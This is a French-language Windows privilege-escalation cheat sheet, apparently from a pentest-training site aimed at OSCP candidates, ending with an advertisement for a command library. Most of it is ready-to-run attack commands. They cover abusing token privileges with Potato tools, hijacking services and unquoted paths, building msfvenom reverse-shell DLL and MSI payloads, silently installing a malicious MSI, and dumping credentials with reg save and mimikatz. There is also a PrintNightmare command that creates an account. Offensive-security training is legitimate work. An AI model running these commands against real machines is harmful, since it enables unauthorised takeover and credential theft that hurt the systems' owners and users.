# Énumération initiale
Comprenez votre contexte avant tout exploit : qui vous êtes, vos privilèges, le niveau de patch et ce qui est installé.
whoami /privwhoami /groupssysteminfonet user; net localgroup administratorswmic qfe get HotFixID,InstalledOnnetstat -ano# Privilèges de token dangereux
Certains privilèges mènent directement à SYSTEM. Énumérez avec whoami /priv et recoupez avec ce tableau.
| Privilège | Exploitation |
|---|---|
| SeImpersonate | Attaques Potato (PrintSpoofer, GodPotato) |
| SeAssignPrimaryToken | Attaques Potato |
| SeBackup | Lire les ruches SAM/SYSTEM → extraire les hash |
| SeRestore | Écraser n'importe quel fichier protégé |
| SeDebug | Injecter dans un processus SYSTEM |
| SeTakeOwnership | Prendre possession de n'importe quel objet |
reg save HKLM\SAM sam.hive && reg save HKLM\SYSTEM system.hive# Attaques Potato (SeImpersonate)
Les comptes de service (IIS, MSSQL) possèdent généralement SeImpersonatePrivilege. La famille Potato en abuse pour devenir SYSTEM.
PrintSpoofer.exe -i -c cmdGodPotato.exe -cmd "cmd /c whoami"JuicyPotatoNG.exe -t * -p C:\Windows\System32\cmd.exeiis apppool\defaultapppool ou compte de service MSSQL ? Vérifiez whoami /priv — SeImpersonate y est presque toujours.# Services mal configurés
Des permissions de service faibles permettent de remplacer le binaire ou de reconfigurer le service pour exécuter votre payload en SYSTEM.
accesschk.exe -uwcqv "Users" *sc qc SERVICE_NAMEsc config SERVICE_NAME binpath= "C:\temp\rev.exe"sc stop SERVICE_NAME && sc start SERVICE_NAMEicacls "C:\Path\To\service.exe"# Chemins de service non cités
Un chemin de service avec des espaces sans guillemets permet à Windows d'exécuter un chemin partiel antérieur — déposez-y votre binaire.
wmic service get name,pathname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """icacls "C:\Program Files\Some Folder\"copy rev.exe "C:\Program Files\Some.exe"# Registre, AutoRuns & DLL Hijacking
Des clés d'autorun modifiables et des failles d'ordre de recherche des DLL permettent d'exécuter votre code à un privilège plus élevé.
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Runaccesschk.exe -wvu "HKLM\...\Run"msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f dll -o hijack.dll# AlwaysInstallElevated
Si cette politique est activée, tout utilisateur peut installer un MSI en SYSTEM — victoire immédiate.
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedreg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedmsfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f msi -o evil.msimsiexec /quiet /qn /i evil.msi# Chasse aux identifiants
Windows stocke des mots de passe à plus d'endroits qu'on ne le croit — fichiers, registre et mémoire.
reg query HKLM /f password /t REG_SZ /sfindstr /si password *.txt *.ini *.config *.xmldir /s /b C:\Users\*unattend.xml C:\Windows\Panther\*cmdkey /listmimikatz "privilege::debug" "sekurlsa::logonpasswords" exit# Exploits noyau & PrintNightmare
Utilisez les exploits noyau en dernier recours — faites correspondre le build exact de systeminfo.
| Exploit | CVE | Cible |
|---|---|---|
| PrintNightmare | CVE-2021-1675 / 34527 | Service Spooler (la plupart de Windows) |
| HiveNightmare | CVE-2021-36934 | SAM lisible (Win10/11) |
| CVE-2021-40449 | CallbackTable | Win7 – Server 2019 |
| CVE-2020-0787 (BITS) | Déplacement arbitraire de fichier | Win7 – Win10 |
python windows-exploit-suggester.py --database db.xls --systeminfo sysinfo.txtInvoke-Nightmare -NewUser hacker -NewPassword Pass123!# Outils d'énumération automatisés
Automatisez les vérifications — mais validez chaque résultat avant de l'exploiter.
.\winPEASx64.exepowershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks".\Seatbelt.exe -group=all.\SharpUp.exe audit❓ FAQ élévation de privilèges Windows
Par l'énumération. Lancez whoami /priv et whoami /groups, puis systeminfo pour le niveau de patch. WinPEAS aide, mais l'examen OSCP récompense la maîtrise des vérifications manuelles.
Si vous possédez SeImpersonatePrivilege (courant pour les comptes IIS/MSSQL), la famille Potato (PrintSpoofer, GodPotato) en abuse pour usurper le token SYSTEM et s'exécuter en NT AUTHORITY\SYSTEM.
Quand un chemin de service a des espaces sans guillemets, Windows essaie chaque chemin partiel. Si vous pouvez écrire dans un dossier antérieur, votre binaire s'exécute avec les privilèges du service au démarrage.
Une politique permettant à tout utilisateur d'installer des MSI en SYSTEM. Si les clés HKLM et HKCU valent 1, créez un MSI malveillant avec msfvenom et lancez msiexec /quiet /i evil.msi pour un shell SYSTEM.
WinPEAS est l'outil standard. Alternatives : PowerUp (PowerShell), Seatbelt et Windows Exploit Suggester pour les correctifs manquants. Validez toujours manuellement avant d'exploiter.
SeImpersonate/SeAssignPrimaryToken (Potato), SeBackup (lire SAM), SeRestore, SeDebug et SeTakeOwnership. Vérifiez avec whoami /priv.
Avec SYSTEM, extrayez SAM/LSA avec reg save ou mimikatz sekurlsa::logonpasswords. Vous pouvez aussi dumper LSASS avec procdump/comsvcs.dll et l'analyser hors ligne avec pypykatz.
Abuser de l'ordre de recherche des DLL : si un programme privilégié charge une DLL par son nom et que vous pouvez écrire dans un dossier recherché en premier, votre DLL est chargée et s'exécute avec les privilèges du programme.
📚 Ressources liées
- Cheatsheet Élévation de privilèges Linux — Le pendant Linux : sudo, SUID, capabilities, cron et plus
- Cheatsheet Active Directory — Après SYSTEM sur un hôte, pivotez dans le domaine vers Domain Admin
- Cheatsheet OSCP — La privesc Windows est une partie centrale de l'examen OSCP
- Glossaire du pentest — Token, SID, LSASS, SAM et 60+ termes clés définis
Transformez votre compromission SYSTEM en rapport PDF professionnel. L'IA remplit CVE, CVSS et sévérité.
Envie des 12 020+ commandes ?
Cette cheatsheet privesc Windows n'est qu'une branche de la carte. Pentest Mindmap organise 12 020+ commandes en 34 catégories — de la recon à la post-exploitation — avec recherche instantanée et copie en un clic.
Commencer gratuitement →